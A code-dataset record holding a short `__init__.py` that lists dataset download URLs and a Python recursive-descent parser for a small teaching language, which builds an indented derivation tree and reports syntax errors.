| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b47be1bca86696601c57bd60b06ed56686e77d72
| 251
|
py
|
Python
|
narya/datasets/__init__.py
|
JefeDryden/narya
|
e143aa675e85e6dbaac3a52bf1a8e73a990a8037
|
[
"MIT"
] | 99
|
2021-01-14T08:55:07.000Z
|
2022-03-31T21:22:04.000Z
|
narya/datasets/__init__.py
|
JefeDryden/narya
|
e143aa675e85e6dbaac3a52bf1a8e73a990a8037
|
[
"MIT"
] | 26
|
2021-01-28T01:39:57.000Z
|
2022-02-10T03:44:46.000Z
|
narya/datasets/__init__.py
|
JefeDryden/narya
|
e143aa675e85e6dbaac3a52bf1a8e73a990a8037
|
[
"MIT"
] | 35
|
2021-01-17T10:49:20.000Z
|
2022-02-26T04:26:25.000Z
|
"""
Datasets zip:
https://storage.googleapis.com/narya-bucket-1/dataset/homography_dataset.zip
https://storage.googleapis.com/narya-bucket-1/dataset/keypoints_dataset.zip
https://storage.googleapis.com/narya-bucket-1/dataset/tracking_dataset.zip
"""
| 31.375
| 76
| 0.808765
| 35
| 251
| 5.714286
| 0.371429
| 0.12
| 0.225
| 0.375
| 0.775
| 0.775
| 0.775
| 0.775
| 0.775
| 0.54
| 0
| 0.012346
| 0.031873
| 251
| 7
| 77
| 35.857143
| 0.8107
| 0.960159
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c33df6dc6b48f20def2ba31c21fb884515071026
| 36,359
|
py
|
Python
|
parse/Parser.py
|
1163710117/HelloWorld
|
c4f0e7e8ab6c1ee717b68b9fa575a11db85fdeef
|
[
"MIT"
] | null | null | null |
parse/Parser.py
|
1163710117/HelloWorld
|
c4f0e7e8ab6c1ee717b68b9fa575a11db85fdeef
|
[
"MIT"
] | 2
|
2019-07-07T11:44:55.000Z
|
2019-10-21T03:14:38.000Z
|
parse/Parser.py
|
1163710117/hit-1163710117
|
4de45bdf6dd1bd680b8fa0be18f5f3222b11ea9d
|
[
"MIT"
] | 1
|
2019-07-07T10:32:33.000Z
|
2019-07-07T10:32:33.000Z
|
# -*- coding: utf-8 -*-
class Parser():
def __init__(self):
    """Create a parser; the token list is supplied later via analyze()."""
    # Indentation unit used to show nesting depth in the printed parse tree.
    self.indent = "    "
def getNextToken(self, index):
while True:
row = self.tokens[index]
row_number = row.split("\t")[0]
des = row.split("\t")[2]
if not des[0] == "<":
type = "error"
value = des
return row_number, type, value
des = des[1:len(des) - 1]
des = des.split(",")
type = des[0]
value = des[1]
if type == 'NOTE':
self.tokens.remove(self.tokens[index])
else:
break
return row_number, type, value
def analyze(self, tokens):
self.tokens = tokens
index = 0
grade = 0
row_number, type, value = self.getNextToken(index)
if type in ('proc', 'record', 'char', 'int', 'float', 'boolean', 'string'):
index, result = self.P_func(grade, index)
return result
else:
errors = 'error: <' + type + ',' + value + '>' + '\t' + row_number
return errors
def P_func(self, grade, index):
    """P -> D S: emit the P node, then parse declarations and statements."""
    row_number, _tok_type, _tok_value = self.getNextToken(index)
    tree = self.indent * grade + 'P (' + row_number + ')' + '\n'
    index, decls = self.D_func(grade + 1, index)
    index, stmts = self.S_func(grade + 1, index)
    return index, tree + decls + stmts
def D_func(self, grade, index):
    """Parse one declaration D at nesting depth *grade*, starting at *index*.

    Two forms are handled: a ``proc`` declaration (keyword, return type via
    X/C, identifier, parameter list, braced body) and a typed variable or
    record declaration (``T id ;``), each followed by further declarations
    via D1_func.  Returns ``(index, text)`` where *text* is the indented
    parse-tree fragment; on a token mismatch an error line is appended and
    parsing of this declaration stops.
    """
    row_number, type, value = self.getNextToken(index)
    # Indentation prefix for this node: one self.indent per depth level.
    head_str = ''
    for i in range(grade):
        head_str += self.indent
    result = head_str + 'D (' + row_number + ')' + '\n'
    # Child nodes are printed one level deeper.
    head_str = head_str + self.indent
    if type == 'proc':
        index += 1
        result2 = head_str + 'proc (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.X_func(grade+1, index)
        result += result2
        index, result2 = self.C_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == 'IDN':
            index += 1
            result2 = head_str + 'id: ' + value + ' (' + row_number + ')' + '\n'
            result += result2
        else:
            # Mismatch: report it and abandon this declaration.
            index += 1
            self.Error_des(row_number, 'IDN', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == '(':
            index += 1
            result2 = head_str + '( (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '(', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == ')':
            index += 1
            result2 = head_str + ') (' + row_number + ')' + '\n'
            result += result2
        elif type in ('char', 'int', 'float', 'boolean', 'string'):
            # Non-empty parameter list: consume tokens until the closing
            # parenthesis.  NOTE(review): the parameter tokens themselves
            # are skipped, not echoed into the tree.
            while True:
                index += 1
                row_number, type, value = self.getNextToken(index)
                if type == ')':
                    index += 1
                    result2 = head_str + ') (' + row_number + ')' + '\n'
                    result += result2
                    break
        else:
            index += 1
            self.Error_des(row_number, 'char, int, float, boolean, string', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == '{':
            index += 1
            result2 = head_str + '{ (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '{', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        # Procedure body: declarations, then statements.
        index, result2 = self.D_func(grade + 1, index)
        result += result2
        index, result2 = self.S_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == '}':
            index += 1
            result2 = head_str + '} (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '}', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.D1_func(grade+1, index)
        result += result2
        return index, result
    elif type in ('record', 'char', 'int', 'float', 'boolean', 'string'):
        # Variable or record declaration: T id ;
        index, result2 = self.T_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == 'IDN':
            index += 1
            result2 = head_str + 'id: ' + value + '(' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, 'IDN', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == ';':
            index += 1
            result2 = head_str + '; (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            # NOTE(review): the expected token is reported as ':' although
            # the parser checks for ';' here — looks like a copy-paste slip.
            self.Error_des(row_number, ':', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.D1_func(grade+1, index)
        result += result2
        return index, result
    else:
        # Token cannot start a declaration at all.
        index += 1
        self.Error_des(row_number, 'proc, char, int, float, boolean, string', type)
        errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
        return index, errors
def D1_func(self, grade, index):
'''
接收错误字符时返回空字符,即将错误字符当成结束符
:param grade:
:param index:
:return:
'''
head_str = ''
result = ''
for i in range(grade):
head_str += self.indent
row_number, type, value = self.getNextToken(index)
result += head_str + 'D\' (' + row_number + ')' + '\n'
head_str += self.indent
if type in ('proc', 'record', 'char', 'int', 'float', 'boolean', 'string'):
index, result2 = self.D_func(grade+1, index)
result += result2
index, result2 = self.D1_func(grade+1, index)
result += result2
return index, result
else:
return index, ''
def T_func(self, grade, index):
    """Parse the T (type) production.

    T -> X C                 (base type with optional array dimensions)
    T -> record : { D }      (record/struct type)

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    head_str = ''
    result = ''
    # derivation-tree indentation is one self.indent per depth level
    for i in range(grade):
        head_str += self.indent
    row_number, type, value = self.getNextToken(index)
    result2 = head_str + 'T (' + row_number + ')' + '\n'
    result += result2
    head_str += self.indent
    if type in ('char', 'int', 'float', 'boolean', 'string'):
        # base type: X (the keyword) then C (optional '[num]' dimensions)
        index, result2 = self.X_func(grade+1, index)
        result += result2
        index, result2 = self.C_func(grade+1, index)
        result += result2
        return index, result
    elif type == 'record':
        index += 1
        result2 = head_str + 'record (' + row_number + ')' + '\n'
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == ':':
            index += 1
            result2 = head_str + ': (' + row_number + ')' + '\n'
            result += result2
        else:
            # on mismatch: report, append an error line, and stop this branch
            index += 1
            self.Error_des(row_number, ':', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == '{':
            index += 1
            result2 = head_str + '{ (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '{', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        # declarations inside the record body
        index, result2 = self.D_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == '}':
            index += 1
            result2 = head_str + '} (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '}', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        return index, result
    else:
        # token is not in FIRST(T): report and return the error line
        index += 1
        self.Error_des(row_number, 'char, int, float, boolean, string, record', type)
        errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
        result += errors
        return index, result
def X_func(self, grade, index):
    """Parse the X production: a base-type keyword.

    X -> char | int | float | boolean | string

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    out = f"{pad}X ({line_no})\n"
    pad += self.indent
    index += 1  # the token is consumed in both the match and error cases
    if tok_type in ('char', 'int', 'float', 'boolean', 'string'):
        out += f"{pad}{tok_type} ({line_no})\n"
    else:
        self.Error_des(line_no, 'char, int, float, boolean, string', tok_type)
        out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
    return index, out
def C_func(self, grade, index):
    """Parse the C production: an optional chain of array dimensions.

    C -> [ num ] C | epsilon        (epsilon when an IDN follows)

    SECURITY/BUG FIX: the array size used to be validated with
    eval(value) — executing arbitrary token text, and evaluating it
    twice.  It is now parsed once with int(), which accepts the same
    positive decimal integer constants and rejects everything else.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    head_str = self.indent * grade
    row_number, type, value = self.getNextToken(index)
    result = head_str + 'C (' + row_number + ')' + '\n'
    head_str += self.indent
    if type == '[':
        index += 1
        result += head_str + '[ (' + row_number + ')' + '\n'
        row_number, type, value = self.getNextToken(index)
        # safe replacement for isinstance(eval(value), int) and eval(value) > 0
        try:
            size = int(value)
        except (TypeError, ValueError):
            size = None
        if type == 'CONST' and size is not None and size > 0:
            index += 1
            result += head_str + 'num: ' + value + '(' + row_number + ')' + '\n'
        else:
            index += 1
            self.Error_des(row_number, 'CONST', type)
            result += head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == ']':
            index += 1
            result += head_str + '] (' + row_number + ')' + '\n'
        else:
            index += 1
            self.Error_des(row_number, ']', type)
            result += head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            return index, result
        # further dimensions, e.g. int a[2][3]
        index, result2 = self.C_func(grade+1, index)
        result += result2
        return index, result
    elif type == 'IDN':
        # epsilon: the declarator carries no (further) array dimensions
        return index, ''
    else:
        index += 1
        self.Error_des(row_number, '[, IDN', type)
        result += head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
        return index, result
def S_func(self, grade, index):
    """Parse the S (statement) production.

    S -> id S' | if B then S S'' | while B do S | call id ( Elist ) | epsilon

    Any other leading token is treated as a statement terminator and the
    production derives epsilon (an empty fragment is returned).

    BUG FIX: when 'do' was missing after 'while B', the original fell
    through the end of the branch and implicitly returned None, which
    crashed the caller's `index, result2 = ...` unpacking; the missing
    token is now reported like the 'then' case.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    head_str = ''
    result = ''
    for i in range(grade):
        head_str += self.indent
    row_number, type, value = self.getNextToken(index)
    result2 = head_str + 'S (' + row_number + ')' + '\n'
    result += result2
    head_str += self.indent
    if type == 'IDN':
        index += 1
        result2 = head_str + 'id: ' + value + '(' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.S1_func(grade+1, index)
        result += result2
        return index, result
    elif type == 'if':
        index += 1
        result2 = head_str + 'if (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.B_func(grade + 1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == 'then':
            index += 1
            result2 = head_str + 'then (' + row_number + ')' + '\n'
            result += result2
            index, result2 = self.S_func(grade + 1, index)
            result += result2
            index, result2 = self.S21_func(grade+1, index)
            result += result2
            return index, result
        else:
            index += 1
            self.Error_des(row_number, 'then', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
    elif type == 'while':
        index += 1
        result2 = head_str + 'while (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.B_func(grade + 1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == 'do':
            index += 1
            result2 = head_str + 'do (' + row_number + ')' + '\n'
            result += result2
            index, result2 = self.S_func(grade + 1, index)
            result += result2
            return index, result
        else:
            # BUG FIX: this error path was missing entirely (returned None)
            index += 1
            self.Error_des(row_number, 'do', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
    elif type == 'call':
        index += 1
        result2 = head_str + type + ' (' + row_number + ')' + '\n'
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == 'IDN':
            index += 1
            result2 = head_str + type + ': ' + value + '(' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, 'IDN', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        row_number, type, value = self.getNextToken(index)
        if type == '(':
            index += 1
            result2 = head_str + type + ' (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '(', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        # actual-argument list
        index, result2 = self.Elist_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == ')':
            index += 1
            result2 = head_str + type + ' (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, ')', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        return index, result
    else:
        # epsilon: token is not in FIRST(S)
        return index, ''
def S1_func(self, grade, index):
    """Parse the S' production: the tail of a statement beginning with an id.

    S' -> = E ; S | [ E ] L' = E ; S

    BUG FIX: both semicolon checks reported "expected ':'" through
    Error_des although the code tests for ';'; the diagnostics now name
    ';' as the expected token.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    head_str = ''
    result = ''
    for i in range(grade):
        head_str += self.indent
    row_number, type, value = self.getNextToken(index)
    result2 = head_str + 'S\' (' + row_number + ')' + '\n'
    result += result2
    head_str += self.indent
    if type == '=':
        # plain assignment: = E ; S
        index += 1
        result2 = head_str + '= (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.E_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == ';':
            index += 1
            result2 = head_str + '; (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, ';', type)  # FIX: was ':'
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.S_func(grade+1, index)
        result += result2
        return index, result
    elif type == '[':
        # subscripted assignment: [ E ] L' = E ; S
        index += 1
        result2 = head_str + '[ (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.E_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == ']':
            index += 1
            result2 = head_str + '] (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, ']', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.L1_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == '=':
            index += 1
            result2 = head_str + '= (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '=', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.E_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == ';':
            index += 1
            result2 = head_str + '; (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, ';', type)  # FIX: was ':'
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.S_func(grade + 1, index)
        result += result2
        return index, result
    else:
        index += 1
        self.Error_des(row_number, '=, [', type)
        errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
        result += errors
        return index, result
def S21_func(self, grade, index):
    """Parse the optional else-part of an if statement.

    Any token other than 'else' is treated as a terminator: the
    production derives epsilon and no output is produced.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    if tok_type != 'else':
        # epsilon: the if statement has no else branch
        return index, ''
    out = f"{pad}'S' ({line_no})\n"
    pad += self.indent
    index += 1
    out += f"{pad}else ({line_no})\n"
    index, piece = self.S_func(grade + 1, index)
    return index, out + piece
def E_func(self, grade, index):
    """Parse the E (expression) production.

    E -> - E E' | ( E ) E' | const E' | id E''

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    out = f"{pad}E ({line_no})\n"
    pad += self.indent
    if tok_type == '-':
        # unary minus
        index += 1
        out += f"{pad}- ({line_no})\n"
        index, piece = self.E_func(grade + 1, index)
        out += piece
        index, piece = self.E1_func(grade + 1, index)
        out += piece
        return index, out
    if tok_type == '(':
        # parenthesised sub-expression
        index += 1
        out += f"{pad}( ({line_no})\n"
        index, piece = self.E_func(grade + 1, index)
        out += piece
        line_no, tok_type, lexeme = self.getNextToken(index)
        index += 1
        if tok_type != ')':
            self.Error_des(line_no, ')', tok_type)
            out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
            return index, out
        out += f"{pad}) ({line_no})\n"
        index, piece = self.E1_func(grade + 1, index)
        out += piece
        return index, out
    if tok_type == 'CONST':
        index += 1
        out += f"{pad}const: {lexeme}({line_no})\n"
        index, piece = self.E1_func(grade + 1, index)
        out += piece
        return index, out
    if tok_type == 'IDN':
        index += 1
        out += f"{pad}id: {lexeme}({line_no})\n"
        index, piece = self.E2_func(grade + 1, index)
        out += piece
        return index, out
    # token is not in FIRST(E): report and return the error line
    index += 1
    self.Error_des(line_no, '-, (, CONST, IDN', tok_type)
    out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
    return index, out
def E2_func(self, grade, index):
    """Parse the E'' production (follows an identifier inside E).

    E'' -> + E E' | * E E' | - E E' | [ E ] L' E' | epsilon

    BUG FIXES in the '[' branch:
    * the sub-result of E_func was discarded (missing `result += result2`),
      dropping the subscript expression from the printed tree;
    * the matched ']' was echoed as '[' in the output.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    head_str = ''
    result = ''
    for i in range(grade):
        head_str += self.indent
    row_number, type, value = self.getNextToken(index)
    result2 = head_str + 'E\'\' (' + row_number + ')' + '\n'
    result += result2
    head_str += self.indent
    if type in ('+', '*', '-'):
        # binary operator followed by E E' (the three branches were identical)
        index += 1
        result2 = head_str + type + ' (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.E_func(grade + 1, index)
        result += result2
        index, result2 = self.E1_func(grade + 1, index)
        result += result2
        return index, result
    elif type == '[':
        index += 1
        result2 = head_str + '[ (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.E_func(grade + 1, index)
        result += result2  # FIX: sub-result was previously dropped
        row_number, type, value = self.getNextToken(index)
        if type == ']':
            index += 1
            result2 = head_str + '] (' + row_number + ')' + '\n'  # FIX: echoed '['
            result += result2
        else:
            index += 1
            self.Error_des(row_number, ']', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.L1_func(grade+1, index)
        result += result2
        index, result2 = self.E1_func(grade+1, index)
        result += result2
        return index, result
    else:
        # epsilon: no operator or subscript follows the identifier
        return index, ''
def E1_func(self, grade, index):
    """Parse the E' production: ('+' | '*') E E', or epsilon on any
    other token.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    if tok_type not in ('+', '*'):
        # epsilon: no further additive/multiplicative tail
        return index, ''
    out = f"{pad}E' ({line_no})\n"
    pad += self.indent
    index += 1
    out += f"{pad}{tok_type} ({line_no})\n"
    index, piece = self.E_func(grade + 1, index)
    out += piece
    index, piece = self.E1_func(grade + 1, index)
    out += piece
    return index, out
def L_func(self, grade, index):
    """Parse the L production: an array element reference.

    L -> id [ E ] L'

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    out = f"{pad}L ({line_no})\n"
    pad += self.indent
    index += 1  # the leading token is consumed in both outcomes
    if tok_type != 'IDN':
        self.Error_des(line_no, 'IDN', tok_type)
        out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
        return index, out
    out += f"{pad}id: {lexeme}({line_no})\n"
    line_no, tok_type, lexeme = self.getNextToken(index)
    index += 1
    if tok_type != '[':
        self.Error_des(line_no, '[', tok_type)
        out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
        return index, out
    out += f"{pad}[ ({line_no})\n"
    index, piece = self.E_func(grade + 1, index)
    out += piece
    line_no, tok_type, lexeme = self.getNextToken(index)
    index += 1
    if tok_type != ']':
        self.Error_des(line_no, ']', tok_type)
        out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
        return index, out
    out += f"{pad}] ({line_no})\n"
    index, piece = self.L1_func(grade + 1, index)
    out += piece
    return index, out
def L1_func(self, grade, index):
    """Parse the L' production: zero or more '[ E ]' subscripts.

    Any token other than '[' — including an erroneous one — is treated
    as a terminator, deriving epsilon.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    if tok_type != '[':
        # epsilon: no further subscript
        return index, ''
    out = f"{pad}L' ({line_no})\n"
    pad += self.indent
    index += 1
    out += f"{pad}[ ({line_no})\n"
    index, piece = self.E_func(grade + 1, index)
    out += piece
    line_no, tok_type, lexeme = self.getNextToken(index)
    index += 1
    if tok_type != ']':
        self.Error_des(line_no, ']', tok_type)
        out += f"{pad}error: <{tok_type},{lexeme}>\t{line_no}"
        return index, out
    out += f"{pad}] ({line_no})\n"
    index, piece = self.L1_func(grade + 1, index)
    out += piece
    return index, out
def B_func(self, grade, index):
    """Parse the B (boolean expression) production.

    B -> ! B B' | ( B ) B' | true B' | false B' | E relop E B'

    BUG FIXES vs. the original:
    * the CONST '"true"' / '"false"' branches were unreachable because
      the generic relational branch (which also matches 'CONST') was
      tested first; the boolean-literal check now runs before it;
    * the '"false"' branch dropped the B' sub-result and then fell
      through into the error branch; it now mirrors the '"true"' case
      (the two identical bodies are merged).

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    head_str = ''
    result = ''
    for i in range(grade):
        head_str += self.indent
    row_number, type, value = self.getNextToken(index)
    result2 = head_str + 'B (' + row_number + ')' + '\n'
    result += result2
    head_str += self.indent
    if type == '!':
        index += 1
        result2 = head_str + '! (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.B_func(grade + 1, index)
        result += result2
        index, result2 = self.B1_func(grade+1, index)
        result += result2
        return index, result
    elif type == '(':
        index += 1
        result2 = head_str + '( (' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.B_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type == ')':
            index += 1
            result2 = head_str + ') (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, ')', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.B1_func(grade+1, index)
        result += result2
        return index, result
    elif type == 'CONST' and value in ('"true"', '"false"'):
        # boolean literal — must be checked before the relational branch
        index += 1
        result2 = head_str + type + ': ' + value + '(' + row_number + ')' + '\n'
        result += result2
        index, result2 = self.B1_func(grade+1, index)
        result += result2
        return index, result
    elif type in ('-', '(', 'IDN', 'CONST'):
        # relational comparison: E relop E
        index, result2 = self.E_func(grade+1, index)
        result += result2
        row_number, type, value = self.getNextToken(index)
        if type in ('<', '<=', '==', '!=', '>', '>='):
            index += 1
            result2 = head_str + type + ' (' + row_number + ')' + '\n'
            result += result2
        else:
            index += 1
            self.Error_des(row_number, '<, <=, ==, !=, >, >=', type)
            errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
            result += errors
            return index, result
        index, result2 = self.E_func(grade+1, index)
        result += result2
        index, result2 = self.B1_func(grade+1, index)
        result += result2
        return index, result
    else:
        index += 1
        self.Error_des(row_number, '!, (, -, IDN, CONST', type)
        errors = head_str + 'error: <' + type + ',' + value + '>' + '\t' + row_number
        result += errors
        return index, result
def B1_func(self, grade, index):
    """Parse the B' production: ('||' | '&&') B B', or epsilon.

    Any token other than a logical operator — including an erroneous
    one — is treated as a terminator.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    if tok_type not in ('||', '&&'):
        # epsilon: no further logical tail
        return index, ''
    out = f"{pad}B' ({line_no})\n"
    pad += self.indent
    index += 1
    out += f"{pad}{tok_type} ({line_no})\n"
    index, piece = self.B_func(grade + 1, index)
    out += piece
    index, piece = self.B1_func(grade + 1, index)
    out += piece
    return index, out
def Elist_func(self, grade, index):
    """Parse the Elist production: an actual-argument list.

    Elist -> E Elist' when a token in FIRST(E) follows, otherwise
    epsilon (empty argument list).

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    if tok_type not in ('-', '(', 'IDN', 'CONST'):
        # epsilon: the call has no arguments
        return index, ''
    out = f"{pad}Elist ({line_no})\n"
    index, piece = self.E_func(grade + 1, index)
    out += piece
    index, piece = self.Elist1_func(grade + 1, index)
    out += piece
    return index, out
def Elist1_func(self, grade, index):
    """Parse the Elist' production: ',' E Elist', or epsilon.

    Any token other than ',' — including an erroneous one — is treated
    as the end of the argument list.

    :param grade: recursion depth, used only to indent the printed tree
    :param index: index of the next unconsumed token
    :return: (new token index, printable derivation-tree fragment)
    """
    pad = self.indent * grade
    line_no, tok_type, lexeme = self.getNextToken(index)
    if tok_type != ',':
        # epsilon: no further arguments
        return index, ''
    out = f"{pad}Elist' ({line_no})\n"
    pad += self.indent
    index += 1
    out += f"{pad}{tok_type} ({line_no})\n"
    index, piece = self.E_func(grade + 1, index)
    out += piece
    index, piece = self.Elist1_func(grade + 1, index)
    out += piece
    return index, out
def Error_des(self, row_number, expect_value, real_value):
    """Print a diagnostic for an unexpected token and return None.

    :param row_number: source line of the offending token
    :param expect_value: description of the token(s) that were expected
    :param real_value: the token type actually found
    """
    # The message text (Chinese) is preserved verbatim; it reads:
    # "expected <X> here, but <Y> appeared; handling: grammar reading stops".
    detail = f"此处期望'{expect_value}',但实际出现'{real_value}',处理方法:文法读取终止"
    print(f"Error at Line [{row_number}]: [{detail}]")
| 36.800607
| 93
| 0.450397
| 3,560
| 36,359
| 4.45927
| 0.028652
| 0.113953
| 0.078488
| 0.074583
| 0.943181
| 0.928315
| 0.92422
| 0.918488
| 0.917039
| 0.908724
| 0
